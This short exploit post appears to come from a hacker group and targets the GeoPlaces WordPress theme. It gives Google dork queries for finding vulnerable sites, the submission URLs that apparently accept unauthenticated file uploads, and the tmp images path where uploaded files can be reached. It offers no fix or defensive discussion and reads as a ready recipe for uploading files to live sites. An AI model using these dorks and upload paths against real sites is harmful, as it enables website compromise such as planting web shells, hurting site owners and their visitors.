Tested on : anything OS
Dork :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
=========================== exploit -->>
- http://127.0.0.1/?ptype=post_listing
- http://127.0.0.1/?ptype=post_event
- http://127.0.0.1/path/?ptype=post_listing
- http://127.0.0.1/path/?ptype=post_event
view -->>
- http://127.0.0.1/wp-content/themes/GeoPlaces/images/tmp/[here]
- http://127.0.0.1/path/wp-content/themes/GeoPlaces/images/tmp/[here]
note -->>
- null
thank's to -->>
- Allah my GOD, Muhammad my PROPHET, Indonesian Hacker my STYLE.
Wathc video -->>
YOUTUBE
